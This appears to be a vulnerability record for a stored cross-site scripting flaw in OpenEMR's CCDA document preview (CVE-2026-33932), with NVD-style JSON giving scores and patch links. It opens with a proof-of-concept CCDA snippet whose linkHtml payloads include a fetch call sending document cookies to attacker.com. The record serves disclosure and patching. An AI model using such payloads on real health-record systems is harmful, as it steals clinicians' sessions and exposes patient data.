CVE-2026-33932

<!-- Malicious CCDA Document Snippet targeting linkHtml --> <component> <section> <text> <!-- Exploiting href attribute --> <linkHtml href="javascript:alert('CVE-2026-33932 XSS')">Click for patient info</linkHtml> <!-- Exploiting event handler attribute --> <linkHtml onmouseover="fetch('http://attacker.com/?c='+document.cookie)">Hover here</linkHtml> </text> </section> </component>

{"cve": {"id": "CVE-2026-33932", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:39.953", "lastModified": "2026-03-26T16:27:53.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, a stored cross-site scripting vulnerability in the CCDA document preview allows an attacker who can upload or send a CCDA document to execute arbitrary JavaScript in a clinician's browser session when the document is previewed. The XSL stylesheet sanitizes attributes for all other narrative elements but not for `linkHtml`, allowing `href=\"javascript:...\"` and event handler attributes to pass through unchanged. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de código abierto y gratuita para registros de salud electrónicos y gestión de consultorios médicos. Antes de la versión 8.0.0.3, una vulnerabilidad de cross-site scripting almacenado en la vista previa de documentos CCDA permite a un atacante que puede cargar o enviar un documento CCDA ejecutar JavaScript arbitrario en la sesión del navegador de un clínico cuando se previsualiza el documento. La hoja de estilo XSL sanitiza los atributos para todos los demás elementos narrativos, pero no para 'linkHtml', permitiendo que 'href=\"javascript:...\"' y los atributos de gestor de eventos pasen sin cambios. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/95e6078889b5399b12b59117f998560cd94bd47d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-g77x-9p3x-2j8f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}